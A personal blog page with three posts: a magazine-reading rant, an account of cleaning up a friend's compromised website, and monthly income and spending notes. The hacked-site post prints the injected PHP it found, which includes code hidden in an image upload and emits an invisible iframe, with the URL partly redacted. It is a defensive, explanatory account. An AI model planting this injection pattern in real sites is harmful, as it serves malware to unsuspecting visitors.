In-print vs. On-line: What are you reading these days?

Posted by

2

borderImage via Wikipedia

To my readers, I have to apologize for a delay in this weekend’s posting. I spent yesterday evening and this afternoon fixing a blog that was hacked, for a friend. It was unfortunate, it does happen, and it isn’t the end of the world. Really.

Has anyone noticed…? Magazines are getting smaller and MORE expensive at the same time! I was in the local bookstore and they don’t stock many English language magazines. I happened to see a copy of Fortune which I used to enjoy many years ago. I picked it up. It was well over $7 a copy and had less than 80 pages. Yikes! I could buy a book for that price!

It seems to affect only US magazines, and yet I still enjoy the websites of Fortune, Forbes and other magazines. However, TIME is one magazine I will RARELY (if ever) buy. Newsweek is not much better. They’re both hideously expensive here, quite dull a lot of the time (as their focus is primarily the US) and are about as thin as toilet paper.

While I agree that magazine quality isn’t dependent on the AMOUNT of pages, I do have to question the direction these magazines are going in. Has anyone read the Economist lately? That’s hardly a doorstop, but at least it tops out at a reasonable size and makes you want to open it a second or third time!

Perhaps it’s being a Brit, but one of the things that I hate about many modern (and US-based) magazines (including PC magazines, news and biz magazines) is the prevalent use of titles that put me to sleep or shout “hyperbole”! You know the titles – “Ten Top PCs”, “Seven ways to Make More Money”… Most of these types of articles are brain-candy, to attract readers only.

My Reading List

So in this edition, I’ll list my favorite magazines and newspapers.

#1 The Financial Times – I always try to buy the local edition on Saturday to get the weekend news, including Arts, Property, etc. It’s always a good read. At NT$110 it is certainly BETTER value than the other magazines.

#2 The Economist – A great magazine with lots of varied news. While a lot of articles aren’t in depth, they’re usually pretty good summaries. It is certainly a decent read and can keep me busy for several subway journeys.

#3 BusinessWeek – Despite suffering Anorexia in recent months, this journal is still pretty good, if you skip the numerous “Best of…”, “Top ***”, and such like editions. I don’t need puerile Top of the Poop Charts, really. I’m a big boy.

#4 BBC News – I usually visit the BBC News website, primarily for info about Europe, the UK and Asia. Typically stories are well-researched but often lack a specificity for Asian stories.

#5 New York Times – While not offline, I do spend time looking for stories on this resource. The articles are well-written, well-informed and interesting. The tech articles are sometimes wanting, and some of the columnists seem to be writing a personal blog, rather than newspaper reporting, but otherwise a good

Sites  I seldom or never visit anymore: CNN dot com (too parochial, gossip-focused), NewsWeek (never bothered), Time Magazine (over-rated by everyone), … and quite a few others…

What are you reading these days? Do you prefer online or offline news reading?

Hacked? It could happen to your site!

Posted by

“I never thought it would happen to me,” people say. But it does. It can. It might!

It happened to one of my friend’s websites just recently. It all started when he got an email from Google which read:

Dear site owner or webmaster of hacked-domain.com,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below is an example URL on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//www.hacked-blog.com/

We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser

If your site was compromised, it’s important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you’ve secured your site, you can request that the warning be
removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users,
we will remove the warning.

Sincerely,
Google Search Quality Team

Really? Is it possible? How did that happen? What should I do? Well, today was my time to find out the answers to all these questions as we set about tackling the problem.

Turning off the blog

The first thing we did was to isolate the website to protect the users. In fact, Google had already issued a warning on its search results to visitors (which is helpful).

Google Search View

Once we had received notification, it was imperative to isolate the exploit. We were unable to determine the nature or extent of the problem. So we took the easy route. In FTP, we renamed the actual folder as *.hacked and created a new folder with the original domain name as ‘domain.com’. In the domain.com folder, I created a simple html file using Google Docs highlighting the problem. We then renamed that as index.html so that at least any traffic to the websites would be aware of the problem.

Diagnosing the problem

Once I found the files, I started poking around the HTML and PHP files by opening them in FTP as an editor to see the code and this is what I found:

<?php
if (file_exists(“/home/ftp_user/hacked-domain.com/albums/userpics/10001/***.jpg”)) {
include(“/home/ftp_user/hacked-domain.com/albums/userpics/10001/***.jpg”);
} else {

echo “<iframe src=’&#104;&#116;&#etc.;’ width=1 height=1></iframe>”;
}
?><?php
if (file_exists(“/home/ftp_user/hacked-domain.com/albums/userpics/10001/***.jpg”)) {
include(“/home/ftp_user/hacked-domain.com/albums/userpics/10001/***.jpg”);
} else {
echo “< iframe src=’&#104; &#116;&#116;&#112;etc.;’ width=1 height=1></iframe>”;
}
?>

It was easy to spot most of the infected files because they all seemed to share the same “mod time”. Unfortunately, the extent of the problem seems to be huge. Every HTML and PHP file was infected with this mysterious <iframe> command.

While I’m no expert in fixing the problem, I realized that: 1. I was not able to edit all 1200 files; 2. it was likely an exploit that was aimed at unupdated browsers (esp. IE), 3. curing the problem would be easy; and 4. if you are running any PHP apps you need to be on the ball updating software to the latest versions.

Researching the problem

From a cursory  inspection of Google, I was able to identify the general nature of the problem quickly. The Google search term was quite simple “*package name* exploit <iframe>”. In those few minutes, I was able to discover that:

Invisible iframes – Iframe tags are a kind of HTML tag. An iframe creates a small “window” on a webpage so that another webpage can load within the embedded window. Iframes are not always used for nefarious purposes; one frequent use, for example, is to embed a video into a blog post. When used by malicious hackers, an iframe can be made so small that it is invisible, and the visitor to the infected web page never knows that another page is also loading in the tiny iframe window. If you see code for an iframe with width=”0″ and height=”0″ in the source code of any page on your website, you have found an invisible iframe. Iframes are most commonly inserted at the very top or the very bottom of a web page’s source code. A good first place to check for iframes is before the initial <html> tag that starts a web page’s standard code, or after the final </html> that ends a page’s code.

Curing the problem for my poor friend is going to require some work on his part, because in the few seconds that the exploit was active, over 1000 html and php pages were appended with the offending <iframe> code. Very nasty indeed. Worse, these PHP pages are interspersed even through the userdata at times. Fortunately, it is easy to see which files are infected.

Fixing the problem

Well, to get the software up and running again requires a bit of patience on his part. He just needs to download the application, decompress it and upload the files to the domain. I’d strongly suggest a new folder named as hacked-site.com to prevent any cross-contamination.

Copying the userdata across may be a little more complicated, though, as he’ll have to sift for infected PHP pages and the like across hundreds of uploads. Not nice. Perhaps logging in and running a couple of simple Unix commands can help…

Finally, installing the application should be straight forward. Though for this, I’d suggest that he back up his database first.

Have you ever been hacked? What happened? Did you lose any data? How did you fix the problem? I’m not an expert in this area… but I’m learning FAST!

And funny things happen, don’t they! I just edited the post, and then lost it! I don’t know what happened. I found the post on BlogLines! Thank god!

Little Notes on Life – April 25th

Posted by

2

This is just little notes for those of you interested. My Friday ramblings!

Approaching $10K!

This month of April bodes well for the $10K mark that you will see posted. I’ve already done estimates for this target, indicating that I will pass the mark by the end of April. Stay tuned for the income report (it won’t be spectacular, but more than enough to take us over the barrier).

It’s been quite a trek to reach the target. But I’ve managed to earn that $10K and I’ve managed to learn a great deal about the what’s and wherefore’s of making money online and offline.

Anyway, that’s for April 30th.

Affiliate Earnings

My friend, Steve, who runs a website and education agency here in Taipei, was telling me that affiliate marketing is where he’s headed. This is quite a wake-up call for me. In fact, I have been doing a little affiliate stuff for a while through venerable deals, such as Amazon, webhosting deals, and so on. You’ll notice that there are a few affiliate deals on this website, including TTZ media ads, MillionaireMate, etc.

These affiliate earnings just don’t generate much but I’m always surprised by how much Amazon brings in. I generated $95.81in sales (it’s not so much in actual earnings) since the beginning of the year. Not bad. It’s a little encouragement for me, because affiliate marketing always seems so hard.

Blog Carnivals

Other projects in the works include the next installment of the Carnival of Making REAL Money. It’s been quite a dog this time, with over 120 submissions (much junk!) and 81 verified. I had to eliminate dozens of entries for the simplest of reasons including:

  • multiple submissions from the same blog/author;
  • articles with no commenting function;
  • articles with closed comments;
  • articles that are reposted from article directories;
  • articles that I can’t understand, don’t make sense, are crap or irrelevant.

It’s amazing how many people think that Blog Carnival is just a receptacle for their spam. It’s also amazing to see how people just do not bother to read the individual Blog Carnival’s criteria. It’s also quite shocking that someone (and there quite a few!) who keep resubmitting the same (junk) articles each issue (and never seem to wonder why it’s not published!)…

But to those other great article writers who submit each issue, I must say thank you AGAIN! Just check out the carnival to see who they are!

Credit Card Debt

I usually give a credit card report and the past few months I’ve made slightly costly mistakes. This month, though, I only had three transactions to report: NT$2000 for the regular life insurance payment, NT$2018 that we paid for a meal in a restaurant in late March. I’m a sucker for Indian food ever since I worked as a waiter in a well-known Indian restaurant in Edinburgh called Kalpna. The restaurant in Taipei’s Tienmou is a fairly recent addition to the local Indian Food scene which has been improving markedly in the last few years.

The last was a license for a JumpBox installation of WordPress. This is called a virtual appliance. The appliance installs a full Apache server with MYSQL on a Linux base. On top of that, you get an install of WordPress as well. It works well, I find. I had to pay for a license to be able to access the FTP side of things. And when I deployed it at school, it just worked out of the box, and across all the computers. So it was well worth the fee of $49.99.

Total credit card fees were about NT$5,555 with no penalties or credit card charges either! Nice!

Splurging…

Well, it would have been nice, but to celebrate the $10K mark, I finally bought a new 19″LCD monitor from ViewSonic… It wasn’t particularly expensive, nor was it an impulse buy. I really would like to have two such monitors (one for each pc) so that I can be a little more productive on my blog by running two screens at once.

I’ve also been buying a few CDs, which added to my ‘splurge’… so I thought I’d leave you with a couple of the YouTube Videos

And the theme music from Grey’s Anatomy, which is a song I love,

and this song by Snow Patrol…

Have a great weekend! 😀